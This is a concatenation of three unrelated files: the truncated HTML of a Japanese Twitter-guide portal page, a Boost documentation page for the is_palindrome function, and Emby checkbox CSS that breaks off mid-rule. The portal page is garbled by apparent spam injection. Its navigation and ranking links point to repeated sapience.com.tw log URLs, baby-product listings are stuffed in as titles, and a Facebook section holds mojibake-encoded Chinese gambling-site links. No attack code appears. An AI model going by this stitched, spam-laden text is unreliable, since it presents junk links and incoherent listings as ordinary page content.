class="xsmall">ショップ...</span></a> </div> <div class="clearfix"></div> </div> <div class="section-footer endline"> <a href="" class="link-more">D_217 リニーエ L21スワニー キャリーバッグ サイドカー トラベルバッグ</a> </div> </div> <section id="home-articleranking" class="section"> <h1 class="section-title small navi"><a href="/topics">話題アクセスランキング</a></h1> <div class="section-body"> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://api.rethumb.com/v1/width/500/http://news.tv-asahi.co.jp/articles_img/000054140_640.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">ニュース</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021644651.html">http://sapience.com.tw/logs/site-nipponki/02021644651.html</a></li> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021642392.html">http://sapience.com.tw/logs/site-nipponki/02021642392.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>takata 04 アイソ ISO タカタ takata Child Seatチャイルドシート ジュニアシート</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://natalie.mu/media/comic/1502/0212/extra/news_xlarge_majicalo.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="http://twinavi.jp/topics/entertainment#topics-ranking">エンタメ</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>新鋭・鈍速毎日が描く熱血魔法少女アクション...</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>クイニー ザップ エクストラ 2(ブルーデニム) クイニー quinnyベビーカー?バギー 三輪ベビーカー 【HLS_DU】,すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </a></li> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021640182.html">http://sapience.com.tw/logs/site-nipponki/02021640182.html</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://pbs.twimg.com/media/CXxje1GUMAAo8pE.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">オモシロ</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>ピントと写真の関係性について。</a></li> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021634473.html">http://sapience.com.tw/logs/site-nipponki/02021634473.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>子供たちにかかわるすべての大人たちへ。さま...</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="/topics/lifestyle/560bcdc1-aa20-49c0-aa74-6230ac133a21" class="block"><img src="http://twinavi.jp/articles/wp-content/uploads/2015/11/tweet-alt-pic.png" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">ライフスタイル</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021634171.html">http://sapience.com.tw/logs/site-nipponki/02021634171.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>母が不幸なのはわたしのせいではない。わたし...</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>代引不可手作りランドセル たくみ<総牛革>(黒)</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="/img/topics/thumbnail/internetcom.gif?1450773495" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">IT</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>Google カレンダーのデータを Excel にエクス...</a></li> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021634920.html">http://sapience.com.tw/logs/site-nipponki/02021634920.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>家族で使いやすいLINEスタンプ登場--「洗濯し...</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://www.gizmodo.jp/images/2015/12/151225arcticwinter.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">カルチャー</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>トーマス木製シリーズ 大きな森の製材所セット Y4497(製材所セット) フィッシャープライス Fisher-Price おもちゃ 木のおもちゃ マテル【HLS_DU】</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank2">2</span>海の上はハードル高すぎた…SpaceX、ついに地...</a></li> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021644361.html">http://sapience.com.tw/logs/site-nipponki/02021644361.html</a></li> </ol> </div> <div class="clearfix"></div> <div class="column home-buzzimage"> <a href="" class="block"><img src="http://f.image.geki.jp/data/image/news/2560/154000/153676/news_153676_1.jpg" class="article-thumbnail" alt="" /></a> </div> <div class="home-buzzlinks"> <h2 class="small"><a href="">スポーツ</a>:</h2> <ol class="home-rankinglist"> <li class="small list-s"><a href="" class="ranking"><span class="rank rank1">1</span>徳島がDF村松の契約満了を発表</a></li> <li class="small list-s"><a href="http://sapience.com.tw/logs/site-nipponki/02021640024.html">http://sapience.com.tw/logs/site-nipponki/02021640024.html</a></li> <li class="small list-s"><a href="" class="ranking"><span class="rank rank3">3</span>「彼らは素晴らしい選手」個性磨いた神奈川県...</a></li> </ol> </div> <div class="clearfix"></div> </div> </section> <section id="home-faq" class="section"> <h1 class="section-title small navi"><a href="">Twitter使い方ガイド よくある質問アクセスランキング</a></h1> <div class="section-body"> <ol> <li class="small list-l lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021642832.html">http://sapience.com.tw/logs/site-nipponki/02021642832.html</a></li> <li class="small list-l lined"><a href="" class="ranking"><span class="rank rank2">2</span>自分のツイートを削除するにはどうしたらいいですか?</a></li> <li class="small list-l lined"><a href="" class="ranking"><span class="rank rank3">3</span>ヌナ トラベルコット セナ カトージ Katojinuna sena ベビーサークル 室内グッズ</a></li> </ol> </div> <div class="section-footer"> <a href="" class="link-more">もっと知りたい!「Twitter使い方ガイド」</a> </div> </section> </div> </div> <aside class="column sub"> <section id="twinavi-tweet" class="section"> <h1 class="section-title small">最新のツイナビツイート</h1> <div class="section-body"> <p class="small">【話題のツイート】私が「♪お手〜伝いロボ♪ 緊急出動〜♪」って歌えば、子供達は… <a rel="nofollow" target="_blank" href="">シルバークロス クラシック スリープオーバー マリーナSilverCross シルバークロス A型ベビーカー 多機能ベビ-カ-</a></p> </div> <div class="follow_sidebar follow_twitter"> <span class="altimg hukidashi"></span> <div class="column"> <a href="" title="ツイナビのTwitterアカウント" class="altimg icon m ic-twinavi">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 <</a> </div> <div class="giftext icon-m"> <a href="" title="ツイナビのTwitterアカウント" class="small">Twitterの最新情報をチェックしよう!</a> <a href="https://twitter.com/" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="true">をフォロー</a> </div> <div class="clearfix"></div> </div> </section> <section id="facebook" class="section"> <p class="small">Facebook<a href="http://www.xpj3344111.com/">ÐÂÆÏ¾©ÓéÀÖ</a> <a href="http://www.zq3344111.com/">ÕæÇ®Å£Å£</a> <a href="http://www.ylc3344111.com/">ÓéÀÖ³Ç</a> <a href="http://www.xy28tu.com/">pcµ°µ°×ßÊÆÍ¼</a> <a href="http://www.pcrgs.com/">pcµ°µ°ÔÚÏßÔ¤²âÍø</a> <a href="http://www.nin168.com/">pcµ°µ°ÐÒÔË28app</a> <a href="http://www.xinjiapo28app.com/">ÐÂ¼ÓÆÂÐÒÔË28app</a> <a href="http://www.jianada28app.com/">¼ÓÄôóÐÒÔË28</a> <a href="http://www.kuai28.com/">ÐÒÔË28¼¼ÇÉ</a> <a href="http://www.pcdd-app.com/">pcµ°µ°ÐÒÔË28app</a> <a href="http://www.xy28xiazai.com/">pcµ°µ°×ßÊÆÍ¼</a> <a href="http://www.8883344111.com/">888ÕæÈËÓéÀÖ</a> <a href="http://www.uni588.com/web/zhongbanghaotie/25562.html">È«Ñ¶Íø</a> <a href="http://www.uni588.com/web/zhongbanghaotie/25563.html">ÕæÈËţţ</a> <a href="http://www.yl3344111.com/">ÓÀÀûÓéÀÖ</a> <a href="http://www.qx3344111.com/">È«Ñ¶Íø</a> <a href="http://www.zr3344111.com/">888ÕæÈËÓéÀÖ</a> <a href="http://www.xy28uu.com/">xy28Ô¤²â</a></p> <div class="follow_fb"><div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="55" data-show-faces="false"></div></div> </section> <section id="home-side-account" class="section"> <h1 class="section-title small sub"><a href="">有名アカウントを探す</a></h1> <div class="section-body-sub"> <ul> <li> <a href="" class="lined all block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 総合<br /> <span class="num mute xsmall">71,071人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/645312064815128576/v_uMNqPs_bigger.jpg" alt="GACKT" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 有名人・芸能人<br /> <span class="num mute xsmall">2,867人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/680394216774619138/6MmJRmsb_bigger.jpg" alt="タワーレコード川崎店(通称:タワ崎)" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> エンタメ<br /> <span class="num mute xsmall">3,226人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> <span style="letter-spacing:-2px">くらし・おでかけ</span><br /> <span class="num mute xsmall">6,128人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/609171843761594368/oBhlek1O_bigger.png" alt="ショップジャパン【公式】" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> メディア<br /> <span class="num mute xsmall">一輪車</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/428453450527940609/6BmKmb99_bigger.jpeg" alt="旭川市旭山動物園[公式]" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> 社会・政治<br /> <span class="num mute xsmall">886人</span> </span> </a> </li> <li> <a href="" class="lined block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/1245987829/tokoro_san_bigger.jpg" alt="所英男" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> スポーツ<br /> <span class="num mute xsmall">1,080人</span> </span> </a> </li> <li> <a href="" class="lined last block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/666407537084796928/YBGgi9BO_bigger.png" alt="Twitter" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> ビジネス・経済<br /> <span class="num mute xsmall">知育玩具?幼児玩具</span> </span> </a> </li> <li> <a href="" class="lined last block"> <span class="column icon-32"> <img src="http://pbs.twimg.com/profile_images/525836947420237824/MNKjOzix_bigger.png" alt="SHOPLIST" class="icon icon32" style="margin-top:3px" /> </span> <span class="giftext icon-32 small"> サービス<br /> <span class="num mute xsmall">3,871人</span> </span> </a> </li> </ul> <div class="clearfix"></div> </div> </section> <section class="section"> <h1 class="section-title small sub"><a href="">ツイッター使い方ガイド</a></h1> <div class="section-body-sub"> <ul> <li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021637436.html">http://sapience.com.tw/logs/site-nipponki/02021637436.html</a></li> <li class="small dotted lined"><a href="">基本的な使い方</a></li> <li class="small dotted lined"><a href="http://sapience.com.tw/logs/site-nipponki/02021640182.html">http://sapience.com.tw/logs/site-nipponki/02021640182.html</a></li> <li class="small dotted lined"><a href="">FAQ よくある質問</a></li> <li class="small dotted lined last" last><a href="">音楽?楽器</a></li> </ul> </div> </section> <div class="section section-fbwidget"> <div class="section-title small sub">Facebook</div> <div class="fb-like-box" data-href="http://www.facebook.com/" data-width="292" data-height="255" data-colorscheme="light" data-show-faces="true" data-header="false" data-stream="false" data-show-border="false">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </div> </div> </aside> <div class="clearfix"></div> <nav class="contents"> <br /> <a href="" class="link-top absright">ページの上部へ</a> </nav> </div> <footer id="pagefooter" class="wrapper"> <div class="contents"> <nav> <ul id="sitemap"> <li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-topics">話題</a></span> <ul> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021638460.html">http://sapience.com.tw/logs/site-nipponki/02021638460.html</a></li> <li><a href="">ニュース</a></li> <li><a href="">ピアノ?キーボード</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021642974.html">http://sapience.com.tw/logs/site-nipponki/02021642974.html</a></li> <li><a href="">エンタメ</a></li> <li><a href="">IT</a></li> <li><a href="">カルチャー</a></li> <li><a href="">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </a></li> <li><a href="">お知らせ</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-matome">まとめ</a></span> <ul> <li><a href="http://twinavi.jp/matome/category/%E3%82%B3%E3%83%9F%E3%83%83%E3%82%AF%E3%83%BB%E3%82%A2%E3%83%8B%E3%83%A1">コミック・アニメ</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a></li> <li><a href="">映画</a></li> <li><a href="" class="div-inner small on">TV番組</a></li> <li><a href="">芸能(海外)</a></li> <li><a href="http://twinavi.jp/matome/category/%E8%8A%B8%E8%83%BD%EF%BC%88%E5%9B%BD%E5%86%85%EF%BC%89">芸能(国内)</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83">プロ野球</a></li> <li><a href="">Jリーグ</a></li> <li><a href="">レゴブロック(LEGO)</a></li> <li><a href="http://twinavi.jp/matome/category/%E3%82%AC%E3%82%B8%E3%82%A7%E3%83%83%E3%83%88">ガジェット</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021635717.html">http://sapience.com.tw/logs/site-nipponki/02021635717.html</a></li> <li><a href="">レゴ シティ</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021640892.html">http://sapience.com.tw/logs/site-nipponki/02021640892.html</a></li> <li><a href="">IT</a></li> <li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">音楽</a></li> <li><a href="">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </a></li> <li><a href="">社会</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021634827.html">http://sapience.com.tw/logs/site-nipponki/02021634827.html</a></li> </ul> <br class="block clearfix"><br> </li> <li class="sitemap-block"> <span class="top-sitemap"><a href="http://sapience.com.tw/logs/site-nipponki/02021638538.html">http://sapience.com.tw/logs/site-nipponki/02021638538.html</a></span> <ul> <li><a href="">インタビュー 一覧</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span> <ul> <li><a href="./index.html">総合</a></li> <li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">有名人・芸能人</a></li> <li><a href="">エンタメ</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021639643.html">http://sapience.com.tw/logs/site-nipponki/02021639643.html</a></li> <li><a href="">メディア</a></li> <li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ビジネス・経済</a></li> <li><a href="">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </a></li> <li><a href="">スポーツ</a></li> <li><a href="">サービス</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021635263.html">http://sapience.com.tw/logs/site-nipponki/02021635263.html</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-topics">特別企画</a></span> <ul> <li class="clearfix"><a href="">アンケート</a></li> <li><a href="">選挙</a></li> </ul> </li> <li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitter使い方ガイド</a></span> <ul> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021647564.html">http://sapience.com.tw/logs/site-nipponki/02021647564.html</a></li> <li><a href="">Twitterとは</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021634607.html">http://sapience.com.tw/logs/site-nipponki/02021634607.html</a></li> <li><a href="">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </a></li> <li><a href="">よくある質問</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021634171.html">http://sapience.com.tw/logs/site-nipponki/02021634171.html</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-twitter">ツイッター検索</a></span> <ul> <li><a href="">キーワード検索</a></li> <li><a href="">ユーザー会話検索</a></li> </ul> <br class="block clearfix"><br> <span class="top-sitemap"><a href="" class="servicename ti-help">ツイナビヘルプ</a></span> <ul> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021634171.html">http://sapience.com.tw/logs/site-nipponki/02021634171.html</a></li> <li><a href="">よくある質問</a></li> </ul> </li> </ul> </nav> <div class="clearfix"></div> </div> <div id="footer-giftext"> <div class="contents"> <!-- giftext --> <div class="column footer-giftext"> <div class="column"> <a href="http://sapience.com.tw/logs/site-nipponki/02021638765.html">http://sapience.com.tw/logs/site-nipponki/02021638765.html</a> </div> <div class="giftext icon-m"> <span class="subtitle">ツイナビ公式Twitter</span> <a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">ミニベッド カトージ KATOJI ベビーベッド コンパクト【HLS_DU】</a> </div> </div> <div class="column footer-giftext"> <div class="column"> <a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a> </div> <div class="giftext icon-m"> <span class="subtitle">ツイナビ公式Facebook</span> <div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </div> </div> </div> <div class="column footer-giftext twinavismart"> <div class="column"> <a href="" class="altimg icon m ic-twinavismart">ツイナビforスマートフォン</a> </div> <div class="giftext icon-m"> <span class="subtitle"><a href="">ツイナビforスマートフォン</a></span> <span class="xsmall"><a href="">スマートフォンでアクセス!</a></span> </div> </div> <!-- //giftext --> <div class="clearfix"></div> </div> </div> <div class="contents last"> <ul id="docs" class="centered xsmall"> <li><a href="">ツイナビ ホーム</a></li> <li><a href="">利用規約</a></li> <li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">個人情報保護方針</a></li> <li><a href="">健全化に関する指針</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021636234.html">http://sapience.com.tw/logs/site-nipponki/02021636234.html</a></li> <li><a href="http://sapience.com.tw/logs/site-nipponki/02021645768.html">http://sapience.com.tw/logs/site-nipponki/02021645768.html</a></li> <li><a href="">広告掲載について</a></li> <li class="last"><a href="">お問い合わせ</a> </ul> <p class="centered xsmall"><small>Copyright &copy; 2016 All rights reserved.</small></p> </div> </footer> <div class="hide"> <div id="preregister-box"> <p class="preregister-title large">すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </p> <p class="preregister-text">おむつ?トイレ<br/>NEW 熱中知育プレミアムピープル PEOPLE PREMIUM 歩きメデスの後継機種おもちゃ 知育玩具【HLS_DU】,すくすくチェアAX ガードタイプ 大和屋 yamatoya【ガード付】 ベビーチェア【HLS_DU】 </p> <p><a href="" class="btn login preregister-login">Twitterでの認証に進む</a></p> </div> </div> </body> </html>
myodd/boost/libs/algorithm/doc/html/boost/algorithm/is_palin_idm45654374984096.html
FFMG/myoddweb.piger
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Function template is_palindrome</title> <link rel="stylesheet" href="../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="../../index.html" title="The Boost Algorithm Library"> <link rel="up" href="../../header/boost/algorithm/is_palindrome_hpp.html" title="Header &lt;boost/algorithm/is_palindrome.hpp&gt;"> <link rel="prev" href="is_palin_idm45654374988464.html" title="Function template is_palindrome"> <link rel="next" href="is_palin_idm45654374978032.html" title="Function is_palindrome"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../boost.png"></td> <td align="center"><a href="../../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="is_palin_idm45654374988464.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../header/boost/algorithm/is_palindrome_hpp.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="is_palin_idm45654374978032.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="refentry"> <a name="boost.algorithm.is_palin_idm45654374984096"></a><div class="titlepage"></div> <div class="refnamediv"> <h2><span class="refentrytitle">Function template is_palindrome</span></h2> <p>boost::algorithm::is_palindrome</p> </div> <h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2> <div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: &lt;<a class="link" href="../../header/boost/algorithm/is_palindrome_hpp.html" title="Header &lt;boost/algorithm/is_palindrome.hpp&gt;">boost/algorithm/is_palindrome.hpp</a>&gt; </span> <span class="keyword">template</span><span class="special">&lt;</span><span class="keyword">typename</span> R<span class="special">,</span> <span class="keyword">typename</span> Predicate<span class="special">&gt;</span> <span class="keyword">bool</span> <span class="identifier">is_palindrome</span><span class="special">(</span><span class="keyword">const</span> <span class="identifier">R</span> <span class="special">&amp;</span> range<span class="special">,</span> <span class="identifier">Predicate</span> p<span class="special">)</span><span class="special">;</span></pre></div> <div class="refsect1"> <a name="idm44798501293248"></a><h2>Description</h2> <p> </p> <div class="note"><table border="0" summary="Note"> <tr> <td rowspan="2" align="center" valign="top" width="25"><img alt="[Note]" src="../../../../../../doc/src/images/note.png"></td> <th align="left">Note</th> </tr> <tr><td align="left" valign="top"><p>This function will return true for empty sequences and for palindromes. For other sequences function will return false. Complexity: O(N). </p></td></tr> </table></div> <p> </p> <div class="variablelist"><table border="0" class="variablelist compact"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><span class="term">Parameters:</span></p></td> <td><div class="variablelist"><table border="0" class="variablelist compact"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody> <tr> <td><p><span class="term"><code class="computeroutput">p</code></span></p></td> <td><p>A predicate used to compare the values.</p></td> </tr> <tr> <td><p><span class="term"><code class="computeroutput">range</code></span></p></td> <td><p>The range to be tested. </p></td> </tr> </tbody> </table></div></td> </tr> <tr> <td><p><span class="term">Returns:</span></p></td> <td><p>true if the entire sequence is palindrome</p></td> </tr> </tbody> </table></div> </div> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2010-2012 Marshall Clow<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="is_palin_idm45654374988464.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../header/boost/algorithm/is_palindrome_hpp.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="is_palin_idm45654374978032.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
MediaBrowser.WebDashboard/dashboard-ui/bower_components/emby-webcomponents/emby-checkbox/emby-checkbox.css
7illusions/Emby
.mdl-checkbox { position: relative; z-index: 1; vertical-align: middle; display: inline-flex; box-sizing: border-box; width: 100%; margin: 0; padding: 0; padding-left: 2.6em; align-items: center; height: 2.3em; } .checkboxFieldDescription { padding-left: 2.6em; } .checkboxContainer { margin-bottom: 2em; display: flex; } .checkboxContainer-withDescription { flex-direction: column; } .mdl-checkbox__input { position: absolute; /* 1px is for focusing purposes, so the focusManager doesn't skip over it */ width: 1px; height: 1px; margin: 0; padding: 0; opacity: 0; -ms-appearance: none; -moz-appearance: none; -webkit-appearance: none; appearance: none; border: none; } .checkboxOutline { position: absolute; top: 3px; left: 0; display: inline-block; box-sizing: border-box; width: 1.83em; height: 1.83em; margin: 0; cursor: pointer; overflow: hidden; border: 2px solid currentcolor; border-radius: 2px; z-index: 2; } .mdl-checkbox__input:checked + span + span + .checkboxOutline { border-color: #52B54B; } .mdl-checkbox__input[disabled] + span + span + .checkboxOutline { border-color: rgba(0, 0, 0, 0.26); cursor: auto; } .mdl-checkbox__focus-helper { position: absolute; top: -0.915em; left: -0.915em; width: 3.66em; height: 3.66em; display: inline-block; box-sizing: border-box; margin: 3px 0 0 0; border-radius: 50%; background-color: transparent; } .mdl-checkbox__input:focus + span + .mdl-checkbox__focus-helper { background-color: rgba(82, 181, 75, 0.26); } .mdl-checkbox__tick-outline { position: absolute; top: 0; left: 0; height: 100%; width: 100%; background: transparent; transition-duration: 0.28s; transition-timing-function: cubic-bezier(0.4, 0, 0.2, 1); transition-property: background; } .mdl-checkbox__input:checked + span + span + .checkboxOutline .mdl-checkbox__tick-outline { background: #52B54B url("data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjxzdmcKICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIgogICB4bWxuczpjYz0iaHR0cDovL2NyZWF0aXZlY29tbW9ucy5vcmcvbnMjIgogICB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiCiAgIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciCiAgIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIKICAgdmVyc2lvbj0iMS4xIgogICB2aWV3Qm94PSIwIDAgMSAxIgogICBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSJ4TWluWU1pbiBtZWV0Ij4KICA8cGF0aAogICAgIGQ9Ik0gMC4wNDAzODA1OSwwLjYyNjc3NjcgMC4xNDY0NDY2MSwwLjUyMDcxMDY4IDAuNDI5Mjg5MzIsMC44MDM1NTMzOSAwLjMyMzIyMzMsMC45MDk2MTk0MSB6IE0gMC4yMTcxNTcyOSwwLjgwMzU1MzM5IDAuODUzNTUzMzksMC4xNjcxNTcyOSAwLjk1OTYxOTQxLDAuMjczMjIzMyAwLjMyMzIyMzMsMC45MDk2MTk0MSB6IgogICAgIGlkPSJyZWN0Mzc4MCIKICAgICBzdHlsZT0iZmlsbDojZmZmZmZmO2ZpbGwtb3BhY2l0eToxO3N0cm9rZTpub25lIiAvPgo8L3N2Zz4K"); } .mdl-checkbox__input:checked[disabled] + span + span + .checkboxOutline .mdl-checkbox__tick-outline { background: rgba(0, 0, 0, 0.26) 